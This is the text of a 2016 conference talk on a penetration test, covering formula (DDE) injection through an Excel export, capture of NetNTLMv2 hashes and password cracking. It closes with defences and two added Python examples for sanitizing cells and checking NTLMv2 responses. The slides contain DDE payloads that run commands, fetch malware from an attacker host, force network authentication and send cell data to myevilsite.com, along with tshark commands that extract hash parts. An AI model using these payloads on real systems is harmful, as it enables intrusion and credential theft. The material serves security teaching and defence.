From CSV to CMD to qwerty
A pentesting war story
Jerome Smith
BSides MCR August 2016
whoami
• In computer security for y years
• Pentester for p years
• At NCC Group for n years
• Where y  2p and p  2n and 2n + 5  y
• CREST CCT (App)
• Presented at first BSides MCR “SSL Checklist for Pentesters”
• exploresecurity.com | @exploresecurity
2
Based on a true story...
The story, characters, and incidents portrayed in this presentation are real.
Any similarity to actual events is completely intentional.
Some details have been changed for the sake of anonymity.
If you can identify any actual persons, places, buildings or products then I’m
in trouble so keep it to yourself.
3
Plot
1. Web application with Excel export
2. Command execution on users’ machines (from CSV to CMD…)
3. Grabbing hashes from low-level users
4. Cracking hashes (…to qwerty)
5. Chase bugs
6. Can we improve the attack?
• Why do we get these warnings?
• Can we do anything to stop them?
4
5
Setting the scene
Background
• Global business in finance sector
• IIS 6.0
• Classic ASP
• What could possibly go wrong?
Excel export
• Request data
• Click export to Excel
• Returned JavaScript to build a form
• Form POSTed to another page to return the Excel file
6
Final POST
7
Export to Excel page
Reflection of user input
• Request:
http://app/excel.asp?p=hello+world
• Returned:
HTTP/1.1 200 OK
Content-Type: text/html
Content-Disposition: attachment; filename="ExcelOuput-46373.xls"
Cache-control: public
hello world
Attack scenarios
• Spoof data (deceive victim)
• Exploit Excel vulnerabilities
• OS command execution
In general, caching of file downloads is often less secure
Exploit Excel vulnerabilities?
8
9
0x01 – 0xFF
10
OS command execution
Dynamic Data Exchange (DDE)
• Old Microsoft technology to facilitate data transfer between applications
• A form of Inter-Process Communication (IPC)
• Security risks of Excel export first widely publicised by @albinowax
http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/
• Consider:
http://app/excel.asp?p=%3dcmd|'%2fk+ipconfig'!A0
• Returns the “XLS” file:
=cmd|'/k ipconfig'!A0
service | topic ! item
11
Warnings
Why wouldn’t it be secure?
The file came from our finance
app and I requested it!
12
Command execution
cmd /k persists the window for a screenshot
Otherwise it runs in a minimised window and exits 
13
Domain credentials
• Now how about:
• cmd /c \\<attacker_IP>\evil$\malware.exe
• cmd /c net use \\<attacker_IP>\c$
• An ISP should block outbound SMB ports but we’re inside, remember
• Domain user account, no pentest laptop …
• But another corporate workstation had Wireshark on it
Domain\username for free
14
Cracking NTLMv2 – John
http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats
username:$NETNTLMv2$domain$challenge$HMAC-MD5$blob
smithjer:$NETNTLMv2$domain$challenge$HMAC-MD5$blob
15
NTLM authentication
Challenge-response
1. Client → Server (Type 1, negotiation)
Features supported by the client and requested of the server
2. Server → Client (Type 2, challenge)
Features supported and agreed upon by the server + a challenge
3. Client → Server (Type 3, authentication).
More information about the client + response(s)
NTLM vs NTLMv2
• All about the calculation of the response
• NTLM: MD4 and DES (weak)
• NTLMv2: HMAC-MD5 (input > password & challenge, hence “blob”)
16
Type 1 message
Type 1 (negotiation)
Client OS (Windows 7)
N.B. little endian: dec7601 = 0x1DB1
Wireshark
filter
“ntlmssp”
17
Type 2 message
Type 2 (challenge)
Challenge Indicates NTLMv2
A block of name-value pairs
Info leakage (server)
18
Wireshark extract bytes
smithjer:$NETNTLMv2$domain$36edff8376e59e18$HMAC-MD5$blob
19
Type 3 message
Domain and username 
Looks like NTLMv2
No LM
Type 3 (authentication)
20
Type 3 message – drill-down
HMAC-MD5 
The “blob” is everything after the HMAC in the “NTLM Response tree”
• Includes client nonce, timestamp, server’s Target Info block…
• Copy NTLM Response bytes, remove first 16 bytes (HMAC)
• Likely to start 0x01010000
See, I told you it was v2 ;-)
blob 
21
Let’s get cracking
smithjer:$NETNTLMv2$domain$36edff8376e59e18$4f68b56e9ce788d010f58b4f049b5c7f$0101000000000000295779de01bbd001b6f…
John
Hashcat
22
Wait a minute...
• Tried hashcat test case for NTLMv2…
admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958...
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
• Tried the same hashcat test case with John – didn’t work
• Tried the smithjer hash on a GPU-based rig…
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
• Tried the smithjer hash with John in hashcat format – it worked!
• So I got my PoC in the report  but why the mixed results?
23
It’s time to activate...
24
John (the Ripper, not Stuart Mill)
Hash cracked:        username::domain:challenge:HMAC-MD5:blob
Hash didn’t crack:   username:$NETNTLMv2$domain$challenge$HMAC-MD5$blob
• Even though John was identifying the hash…
Loaded 1 password hash (NTLMv2 C/R MD4 HMAC-MD5 [32/64])
…it wasn’t processing it correctly
• John wanted the hashcat format
• To be fair to pentestmonkey, the cheatsheet was…
“originally based on john-1.7.8-jumbo-5. Changes in supported hashes
or hash formats since then may not be reflected on this page”
25
Hashcat
Hash                                         Cracked              Didn’t crack
admin (test)  admin:...:blob[53 bytes]       hashcat
smithjer      smithjer:...:blob[360 bytes]   oclHashcat (Linux)   hashcat (Windows)
catflap
• Extracts NTLMv2 exchange from Wireshark capture file
catflap <capture_file>
• Recalculates NTLMv2 response with given password
catflap <capture_file | hashcat_file> <password>
• Allows experiments with other inputs, i.e. the “blob”
• A more faithful check than the standard admin test hash
26
Demo
Hashcat had a bug
• Wasn’t handling “blobs” above a certain size
• Didn’t affect oclHashcat
• Didn’t affect hashcat on Linux (1)
Can we improve the attack?
- i.e. cut out some of those warnings?
28
“Standard” warnings
(1)
(2a)
(3)
(2b)
Users and warnings – Piranha
44% clicked through warnings
70% clicked through warnings
75% clicked through warnings
30
Source of warnings
• Setting is a property of the file
• Only effective if file has been trusted previously
• Two stage attack (low and slow)?
• Benign payload =NotASheet!A1
• Malicious payload
31
Trusted Documents
(1)
(2a)
Only the filename is stored
Downloads with static filenames are of interest
Once “trusted” if the file’s start-up prompt is set to auto-update,
only the third warning (CMD.EXE) is displayed
32
Excel file format
XLSX vs XLS vs CSV
• Not something you always have control over
• CSV: no Protected View warning
• CSV: can’t contain start-up prompt auto-update setting
CSV format in XLS file
• Format warning instead of Protected View warning
• Formal security warnings (1) and (2a) not shown
• Therefore file cannot be “trusted” in the registry
• Curiously CSV format not supported: tab or CRLF cell delimiter
33
That CMD.EXE warning
Built-in Excel functions
• Steal data =HYPERLINK("http://myevilsite.com/?d="&A1,"Click here")
• Limited info about the system e.g. current directory
=INFO("DIRECTORY"), Excel version =INFO("RELEASE")
• =WEBSERVICE(URL)
• Sadly doesn’t support authentication (i.e. force NTLM authentication)
• Or file paths (local or UNC) or file://
• But it will steal data without user interaction (unlike HYPERLINK)
=WEBSERVICE("http://myevilsite.com/?data="&A1)
• =FILTERXML(XML, XPATH)
• Any XXE or parsing bugs?
34
Alternatives to cmd.exe
• =powershell|'Test-Connection 127.0.0.1'!A0
Using 8.3 names doesn’t work as Excel doesn’t like ~ in the formula
=cmd|'/k powershell Test-Connection 127.0.0.1'!A0
PATHEXT environment variable ignored – .exe only
• .exe files in PATH where filename <= 12 characters
=explorer|'https://nccgroup.trust'!A0
=schtasks|'/create /sc DAILY /tn WindowsUpdate /tr calc.exe'!A0
=javaws|'http://myevilsite.com/malware.jnlp'!A0
=rundll32|'shell32.dll,ShellExec_RunDLL calc.exe'!A0
• N.B. if Excel is 32-bit, then the program will be run as such, etc.
35
Native DDE services – 1/2
Tcl (Tool Command Language)
• dde services "" ""
{Excel {[Book1]Sheet1}} {Excel {[Book1]Sheet2}} {Excel {[Book1]Sheet3}}
{Excel System} {PROGMAN PROGMAN} {Shell AppProperties} {Folders AppProperties} {PROGMAN PROGMAN}
Excel
• dde request excel Sheet1 r1c1:r2c3
• dde execute excel Sheet1 {[formula("overwrite","r1c1")]}
• dde execute excel Sheet1 {[alert("hello")][alert("world")]}
• dde execute excel Sheet1 {[file.delete("e:\test")]}
• dde execute excel Sheet1 {[exec("c:\windows\system32\calc.exe")]}
36
Native DDE services – 2/2
Progman
• dde execute progman progman {[AddItem(calc.exe,Microsoft Word)]}
Folders / Shell
• dde execute Folders AppProperties {[ViewFolder("","\\attacker_IP\c$",2)]}
What about in Excel?
• This could save you hours: when testing, if Excel hangs, try closing Tcl
• =Folders|AppProperties!'{[ViewFolder("","c:\windows",1)]}'
• That Tcl Service-Topic list wasn’t complete…
37
DDESpy
• Part of Visual Studio 6 (!)
• Must be running when application launches
38
iexplore DDE
• =iexplore|WWW_OpenURL!nccgroup.com
• No “remote data not accessible” warning 
• Slice of BeEF anyone?
• =iexplore|WWW_OpenURL!'\\<attacker_IP>\c$' (force network authentication)
• =iexplore|WWW_OpenURL!'c:\windows\system32\cmd.exe'
• No better than where we were really!
• No obvious way to include switches anyway – a limitation of file://
39
firefox DDE
• =firefox|WWW_OpenURL!'http://exploresecurity.com/'
• =firefox|WWW_GetWindowInfo!foo
40
Demo
(1) No Protected View warning as CSV
(2) Just “Enable Content” warning as DDE call succeeded
• Background navigation to phishing site could be very effective
(3) No warnings – exactly which stars were aligned there?!
• A file with same name previously downloaded
• Had content to elicit warnings, which were accepted
• So it’s now “trusted”
• Previous file need not have been malicious – remember
=NotASheet!A1
• Malicious file’s start-up prompt set to auto-update links
41
Lessons
From CSV to CMD
• Check out any Excel export that returns user-supplied data
• CSV is not a benign format
• DDE ≠ macro
• In some cases it may be possible to cut down the Excel warnings
• Excel may have more to give in this area
• Progman|Shell|Folders attractive DDE targets as always running
• Very much work in progress – please explore!
• All this stuff applies to red-teaming too
From CMD to qwerty
• Use or develop test cases i.e. something you know should work
• Read the errors!
• “Authoritative” references can go stale
42
Defence
Original article
• Prefix = with '
• This will “cast” the cell as text in XLS[X] and stop execution in CSV
+cmd|'/k ipconfig'!A0
-cmd|'/k ipconfig'!A0
=cmd|'/k ipconfig'!A0
@SUM(cmd|'/k ipconfig'!A0)
"=cmd|'/k ipconfig'!A0"
""=cmd|'/k ipconfig'!A0
=(cmd|'/k ipconfig'!A0)
=0-cmd|'/k ipconfig'!A0
• Validation against a strict whitelist of “known good” (length, characters,
format) should always be the go-to defensive strategy
• Otherwise e.g. for XLS[X] consider always prefixing cell with apostrophe
43
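The two defences on the slide (a strict allow-list first, the apostrophe prefix as the fallback for free text) as an added Python example; this is not code from the talk or from the original Context article. The function names `is_allowed`, `sanitize_cell` and `export_csv` are mine, the injection variants are the ones listed above used as constructed test input, and the tab and carriage-return triggers come from OWASP's CSV injection guidance rather than from the slide:

```python
import csv
import io
import re

# Leading characters that make Excel evaluate a CSV cell as a formula: the four the
# slide's variants start with, plus tab and CR from OWASP's CSV injection guidance.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Allow-list for a "known good" field (length, characters, format in one anchored
# match). It must start alphanumeric, so a leading -, +, = or @ fails before any
# escaping is even considered.
KNOWN_GOOD = re.compile(r"[A-Za-z0-9][A-Za-z0-9 ._-]{0,63}")


def is_allowed(value: str, pattern=KNOWN_GOOD) -> bool:
    """Strict validation, the go-to strategy the slide recommends."""
    return pattern.fullmatch(value) is not None


def sanitize_cell(value):
    """Fallback for free text that has to be exported anyway: prefix with an
    apostrophe so Excel stores the cell as text. Numbers pass through untouched;
    only a string can begin with a formula trigger."""
    if isinstance(value, str) and value.startswith(FORMULA_TRIGGERS):
        return "'" + value
    return value


def export_csv(rows) -> str:
    """Write rows with every text field quoted. Correct quoting matters as much as
    the prefix: a value that itself starts with a double quote is written as
    \"\"\"...\"\"\", so Excel reads a literal quote rather than a formula."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_NONNUMERIC, lineterminator="\r\n")
    for row in rows:
        writer.writerow([sanitize_cell(v) for v in row])
    return buf.getvalue()


# The slide's injection variants, used here as constructed test input.
VARIANTS = [
    "=cmd|'/k ipconfig'!A0",
    "+cmd|'/k ipconfig'!A0",
    "-cmd|'/k ipconfig'!A0",
    "@SUM(cmd|'/k ipconfig'!A0)",
    "\"=cmd|'/k ipconfig'!A0\"",
    "=(cmd|'/k ipconfig'!A0)",
    "=0-cmd|'/k ipconfig'!A0",
]


def all_variants_rejected() -> bool:
    """True when the allow-list turns away every variant on the slide."""
    return not any(is_allowed(v) for v in VARIANTS)


if __name__ == "__main__":
    print("allow-list rejects all variants:", all_variants_rejected())
    print(export_csv([["user", "note", "amount"], ["smithjer", VARIANTS[0], 42]]), end="")
```

Apply `sanitize_cell` only to text columns: a numeric column serialised as a string would otherwise have every negative value prefixed, which is the usual reason teams switch the escaping off again.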
References
DDE
• https://www.tcl.tk/man/tcl8.6/TclCmd/dde.htm (Tcl)
• http://rpackages.ianhowson.com/rforge/tcltk2/man/windows/tk2dde.html (examples)
• https://support.microsoft.com/en-us/kb/128185 (Excel XLM reference)
Hashcat test cases
• http://hashcat.net/wiki/doku.php?id=example_hashes
Catflap
• https://github.com/nccgroup/ (or https://github.com/exploresecurity/catflap)
NTLM deep-dive
• http://davenport.sourceforge.net/ntlm.html
• http://ubiqx.org/cifs/SMB.html#SMB.8
• http://www.innovation.ch/personal/ronald/ntlm.html
• http://hashcat.net/forum/archive/index.php?thread-2011.html
• https://msdn.microsoft.com/en-us/library/cc207842.aspx
44
Appendix 1: NetNTLMv2 from PCAP
Challenge
tshark -Y "ntlmssp.messagetype == 0x00000002" -T fields -e ntlmssp.ntlmserverchallenge
Domain
tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.domain
Username
tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.auth.username
HMAC-MD5
tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 1-32
Blob
tshark -Y "ntlmssp.messagetype == 0x00000003" -T fields -e ntlmssp.ntlmv2_response | sed 's/://g' | cut -c 33-
45
Appendix 2: NetNTLMv2 calculations
1. NTHASH = MD4(Unicode password)
echo -n $2 | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md4 -binary | xxd -p
2. INTHASH = HMAC-MD5(Unicode uppercase username | Unicode domain, NTHASH)
echo -n ${USERNAME^^}$DOMAIN | iconv -f ascii -t utf16 | tail -c +3 | openssl dgst -md5 -mac HMAC -macopt hexkey:$NTHASH -binary | xxd -p
3. HMAC = HMAC-MD5(Challenge | blob, INTHASH)
echo -n $CHALLENGE$BLOB | xxd -r -p | openssl dgst -md5 -mac HMAC -macopt hexkey:$INTHASH -binary | xxd -p
46
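The three calculations above, and the recalculation catflap performs on slide 25, as an added Python example; this is neither catflap nor any code from the talk. It rebuilds the NTLMv2 response from a password and the captured pieces (challenge and blob, the same two fields the Appendix 1 tshark commands cut apart) so that a tool's verdict on a capture you control can be checked against a known test password before you trust it on a real one. MD4 is implemented in pure Python because hashlib's md4 is a legacy algorithm not loaded by every OpenSSL build; the exchange in `build_sample_exchange` (domain CORP, server FILESRV, challenge, nonce, timestamp) is constructed, not taken from the engagement, and all function names are mine:

```python
import hashlib
import hmac
import struct

_MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (only the NT hash needs it)."""
    def rotl(x, n):
        return ((x << n) | (x >> (32 - n))) & _MASK
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)            # bit length, little endian
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for i in range(16):                                              # round 1: F
            a = rotl((a + ((b & c) | (~b & d)) + X[i]) & _MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                              # round 2: G
            k = (i % 4) * 4 + i // 4
            a = rotl((a + ((b & c) | (b & d) | (c & d)) + X[k] + 0x5A827999) & _MASK,
                     (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):                                              # round 3: H
            a = rotl((a + (b ^ c ^ d) + X[r3[i]] + 0x6ED9EBA1) & _MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & _MASK, (B + b) & _MASK, (C + c) & _MASK, (D + d) & _MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """Step 1: NTHASH = MD4(UTF-16LE password)."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_key(nthash: bytes, username: str, domain: str) -> bytes:
    """Step 2: HMAC-MD5 keyed with NTHASH over UPPER(username) || domain in UTF-16LE.
    Only the username is upper-cased; the domain keeps the case the client sent."""
    return hmac.new(nthash, (username.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_response(key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """Step 3: the 16-byte HMAC at the front of the NTLMv2 response = HMAC-MD5(key, challenge || blob)."""
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest()


def verify_response(ex: dict, password: str) -> bool:
    """True if the captured HMAC is what this password produces (the catflap-style check)."""
    key = ntlmv2_key(nt_hash(password), ex["username"], ex["domain"])
    return hmac.compare_digest(ntlmv2_response(key, ex["challenge"], ex["blob"]), ex["response"])


def hashcat_line(ex: dict) -> str:
    """username::domain:challenge:HMAC-MD5:blob, the layout that worked in both tools."""
    return "{}::{}:{}:{}:{}".format(ex["username"], ex["domain"], ex["challenge"].hex(),
                                     ex["response"].hex(), ex["blob"].hex())


def _av_pair(av_id: int, value: str) -> bytes:
    v = value.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(v)) + v


def build_sample_exchange(password: str = "qwerty") -> dict:
    """Constructed exchange (not from the engagement) for CORP\\smithjer."""
    username, domain = "smithjer", "CORP"
    server_challenge = bytes.fromhex("0123456789abcdef")             # constructed
    # Server's Target Info block (Type 2) echoed by the client: AvId 2 = NetBIOS
    # domain, AvId 1 = NetBIOS server, AvId 0 = end of list.
    target_info = _av_pair(2, domain) + _av_pair(1, "FILESRV") + struct.pack("<HH", 0, 0)
    blob = (b"\x01\x01" + b"\x00" * 6                                # RespType, HiRespType, reserved
            + struct.pack("<Q", 131000000000000000)                  # FILETIME timestamp (constructed)
            + bytes.fromhex("a1b2c3d4e5f60718")                       # 8-byte client nonce (constructed)
            + b"\x00" * 4 + target_info + b"\x00" * 4)
    key = ntlmv2_key(nt_hash(password), username, domain)
    return {"username": username, "domain": domain, "challenge": server_challenge,
            "blob": blob, "response": ntlmv2_response(key, server_challenge, blob)}


if __name__ == "__main__":
    ex = build_sample_exchange()
    print(hashcat_line(ex))
    print("qwerty verifies:", verify_response(ex, "qwerty"))
    print("Qwerty verifies:", verify_response(ex, "Qwerty"))
```

The blob starts 0x01010000 as the drill-down slide predicts, and because the HMAC covers the whole blob, a tool that truncates or mishandles a long blob (the hashcat bug above) will never recover the password however correct the hash line looks, which is exactly the failure a known-password check catches.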
fin
You have been watching…
Jerome @exploresecurity
Script passable
Hair needs cutting
Make-up required
Costume is about the right word
Tip of the hat to James @albinowax
Cara @bones_codes
Michael Roberts
Andy @ZephrFish
Raquel Alvarez

More Related Content

PDF
Object Oriented Exploitation: New techniques in Windows mitigation bypass
PDF
Harder Faster Stronger
PDF
Ruxmon cve 2012-2661
PPTX
Vulnerabilities on Various Data Processing Levels
PPTX
Memory Corruption: from sandbox to SMM
PDF
Ruxmon feb 2013 what happened to rails
PDF
Defcon CTF quals
PPTX
Invoke-Obfuscation nullcon 2017
Object Oriented Exploitation: New techniques in Windows mitigation bypass
Harder Faster Stronger
Ruxmon cve 2012-2661
Vulnerabilities on Various Data Processing Levels
Memory Corruption: from sandbox to SMM
Ruxmon feb 2013 what happened to rails
Defcon CTF quals
Invoke-Obfuscation nullcon 2017

What's hot (20)

PPTX
Defending Your "Gold"
PPTX
I hunt sys admins 2.0
PPTX
Derbycon - Passing the Torch
PPTX
Building Better Backdoors with WMI - DerbyCon 2017
PDF
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
PPTX
PowerShell for Penetration Testers
PPTX
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
PDF
The old is new, again. CVE-2011-2461 is back!
PPTX
Secure360 - Extracting Password from Windows
PPTX
Wielding a cortana
PPTX
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PPT
Advanced Topics On Sql Injection Protection
PDF
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
PPTX
Automating Post Exploitation with PowerShell
PDF
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
PDF
The Hunter Games: How to Find the Adversary with Event Query Language
PDF
SANS DFIR Prague: PowerShell & WMI
PDF
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
PPTX
Adventures in Asymmetric Warfare
PDF
Jwt == insecurity?
Defending Your "Gold"
I hunt sys admins 2.0
Derbycon - Passing the Torch
Building Better Backdoors with WMI - DerbyCon 2017
10 Deadly Sins of SQL Server Configuration - APPSEC CALIFORNIA 2015
PowerShell for Penetration Testers
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
The old is new, again. CVE-2011-2461 is back!
Secure360 - Extracting Password from Windows
Wielding a cortana
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Advanced Topics On Sql Injection Protection
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Automating Post Exploitation with PowerShell
Surviving the Java Deserialization Apocalypse // OWASP AppSecEU 2016
The Hunter Games: How to Find the Adversary with Event Query Language
SANS DFIR Prague: PowerShell & WMI
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Adventures in Asymmetric Warfare
Jwt == insecurity?
Ad

Viewers also liked (16)

PPTX
CamSec Sept 2016 - Tricks to improve web app excel export attacks
PPTX
SSL Checklist for Pentesters (BSides MCR 2014)
DOC
Malicious file upload attacks - a case study
PPTX
PPTX
SSL/POODLE: History repeats itself
PPTX
SSLv3 and POODLE
PDF
The Life of Breached Data & The Dark Side of Security
PDF
GPU based password recovery on Linux. TXLF 2013
PPTX
PPT
Salt Cryptography & Cracking Salted Hashes by fb1h2s
PDF
Password Cracking with Rainbow Tables
PPTX
Cyber security and ethical hacking 9
PPTX
Password Attack
PPTX
Password Cracking
PDF
How to Become a Thought Leader in Your Niche
CamSec Sept 2016 - Tricks to improve web app excel export attacks
SSL Checklist for Pentesters (BSides MCR 2014)
Malicious file upload attacks - a case study
SSL/POODLE: History repeats itself
SSLv3 and POODLE
The Life of Breached Data & The Dark Side of Security
GPU based password recovery on Linux. TXLF 2013
Salt Cryptography & Cracking Salted Hashes by fb1h2s
Password Cracking with Rainbow Tables
Cyber security and ethical hacking 9
Password Attack
Password Cracking
How to Become a Thought Leader in Your Niche
Ad

Similar to BSides MCR 2016: From CSV to CMD to qwerty (20)

PDF
From velvet to silk there is still a lot of sweat
PPTX
BSides London 2017 - Hunt Or Be Hunted
PPT
Sneaking Past Device Guard - HITB19AMS
PPT
Sneaking Past Device Guard
PDF
CompTIA PenTest+ PT0-003 PDF Questions and Answers.pdf
PDF
Packet capture and network traffic analysis
PPT
Penetration testing, What’s this?
PDF
Powering up on PowerShell - BSides Charleston - Nov 2018
PPTX
Client side attacks using PowerShell
PDF
Who Should Use Powershell? You Should Use Powershell!
PDF
Power on, Powershell
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
PDF
Windows Security Internals 1 / converted Edition James Forshaw
PPTX
Top 10 ways to make hackers excited: All about the shortcuts not worth taking
PPT
Windows network security
PPTX
Teensy Programming for Everyone
PDF
Attacker's Perspective of Active Directory
PDF
Reducing attack surface on ICS with Windows native solutions
PDF
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
PDF
2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf
From velvet to silk there is still a lot of sweat
BSides London 2017 - Hunt Or Be Hunted
Sneaking Past Device Guard - HITB19AMS
Sneaking Past Device Guard
CompTIA PenTest+ PT0-003 PDF Questions and Answers.pdf
Packet capture and network traffic analysis
Penetration testing, What’s this?
Powering up on PowerShell - BSides Charleston - Nov 2018
Client side attacks using PowerShell
Who Should Use Powershell? You Should Use Powershell!
Power on, Powershell
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
Windows Security Internals 1 / converted Edition James Forshaw
Top 10 ways to make hackers excited: All about the shortcuts not worth taking
Windows network security
Teensy Programming for Everyone
Attacker's Perspective of Active Directory
Reducing attack surface on ICS with Windows native solutions
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
2017-BSidesCharm-DetectingtheElusive-ActiveDirectoryThreatHunting-Final.pdf

Recently uploaded (20)

PPTX
MYSQL Presentation for SQL database connectivity
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
Spectral efficient network and resource selection model in 5G networks
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PDF
Review of recent advances in non-invasive hemoglobin estimation
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
PPTX
Big Data Technologies - Introduction.pptx
PPTX
Spectroscopy.pptx food analysis technology
PDF
Machine learning based COVID-19 study performance prediction
PDF
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
PPTX
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
PPTX
Understanding_Digital_Forensics_Presentation.pptx
PDF
Electronic commerce courselecture one. Pdf
PDF
Encapsulation theory and applications.pdf
PPTX
Cloud computing and distributed systems.
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Dropbox Q2 2025 Financial Results & Investor Presentation
PDF
Encapsulation_ Review paper, used for researhc scholars
PDF
Profit Center Accounting in SAP S/4HANA, S4F28 Col11
MYSQL Presentation for SQL database connectivity
Chapter 3 Spatial Domain Image Processing.pdf
Spectral efficient network and resource selection model in 5G networks
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Review of recent advances in non-invasive hemoglobin estimation
Building Integrated photovoltaic BIPV_UPV.pdf
Advanced methodologies resolving dimensionality complications for autism neur...
Big Data Technologies - Introduction.pptx
Spectroscopy.pptx food analysis technology
Machine learning based COVID-19 study performance prediction
Optimiser vos workloads AI/ML sur Amazon EC2 et AWS Graviton
ACSFv1EN-58255 AWS Academy Cloud Security Foundations.pptx
Understanding_Digital_Forensics_Presentation.pptx
Electronic commerce courselecture one. Pdf
Encapsulation theory and applications.pdf
Cloud computing and distributed systems.
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Dropbox Q2 2025 Financial Results & Investor Presentation
Encapsulation_ Review paper, used for researhc scholars
Profit Center Accounting in SAP S/4HANA, S4F28 Col11

BSides MCR 2016: From CSV to CMD to qwerty

  • 1. From CSV to CMD to qwerty A pentesting war story Jerome Smith BSides MCR August 2016
  • 2. whoami • In computer security for y years • Pentester for p years • At NCC Group for n years • Where y  2p and p  2n and 2n + 5  y • CREST CCT (App) • Presented at first BSides MCR “SSL Checklist for Pentesters” • exploresecurity.com | @exploresecurity 2
  • 3. Based on a true story... The story, characters, and incidents portrayed in this presentation are real. Any similarity to actual events is completely intentional. Some details have been changed for the sake of anonymity. If you can identify any actual persons, places, buildings or products then I’m in trouble so keep it to yourself. 3
  • 4. Plot 1. Web application with Excel export 2. Command execution on users’ machines (from CSV to CMD…) 3. Grabbing hashes from low-level users 4. Cracking hashes (…to qwerty) 5. Chase bugs 6. Can we improve the attack? • Why do we get these warnings? • Can we do anything to stop them? 4
  • 5. 5 Setting the scene Background • Global business in finance sector • IIS 6.0 • Classic ASP • What could possibly go wrong? Excel export • Request data • Click export to Excel • Returned JavaScript to build a form • Form POSTed to another page to return the Excel file
  • 7. 7 Export to Excel page Reflection of user input • Request: http://app/excel.asp?p=hello+world • Returned: HTTP/1.1 200 OK Content-Type: text/html Content-Disposition: attachment; filename="ExcelOuput-46373.xls" Cache-control: public hello world Attack scenarios • Spoof data (deceive victim) • Exploit Excel vulnerabilities • OS command executionIn general, caching of file downloads is often less secure
  • 10. 10 OS command execution Dynamic Data Exchange (DDE) • Old Microsoft technology to facilitate data transfer between applications • A form of Inter-Process Communication (IPC) • Security risks of Excel export first widely publicised by @albinowax http://www.contextis.com/resources/blog/comma-separated-vulnerabilities/ • Consider: http://app/excel.asp?p=%3dcmd|'%2fk+ipconfig'!A0 • Returns the “XLS” file: =cmd|'/k ipconfig'!A0 service | topic ! item
  • 11. 11 Warnings Why wouldn’t it be secure? The file came from our finance app and I requested it!
  • 12. 12 Command execution cmd /k persists the window for a screenshot Otherwise it runs in a minimised window and exits 
  • 13. 13 Domain credentials • Now how about: • cmd /c <attacker_IPevil$malware.exe • cmd /c net use <attacker_IP>c$ • An ISP should block outbound SMB ports but we’re inside, remember • Domain user account, no pentest laptop … • But another corporate workstation had Wireshark on it Domainusername for free
  • 14. 14 Cracking NTLMv2 – John http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats username:$NETNTLMv2$domain$challenge$HMAC-MD5$blobsmithjer:$NETNTLMv2$domain$challenge$HMAC-MD5$blob
  • 15. 15 NTLM authentication Challenge-response 1. Client → Server (Type 1, negotiation) Features supported by the client and requested of the server 2. Server → Client (Type 2, challenge) Features supported and agreed upon by the server + a challenge 3. Client → Server (Type 3, authentication). More information about the client + response(s) NTLM vs NTLMv2 • All about the calculation of the response • NTLM: MD4 and DES (weak) • NTLMv2: HMAC-MD5 (input > password & challenge, hence “blob”)
  • 16. 16 Type 1 message Type 1 (negotiation) Client OS (Windows 7) N.B. little endian: dec7601 = 0x1DB1 Wireshark filter “ntlmssp”
  • 17. 17 Type 2 message Type 2 (challenge) Challenge Indicates NTLMv2 A block of name-value pairs Info leakage (server)
  • 19. 19 Type 3 message Domain and username  Looks like NTLMv2 No LM Type 3 (authentication)
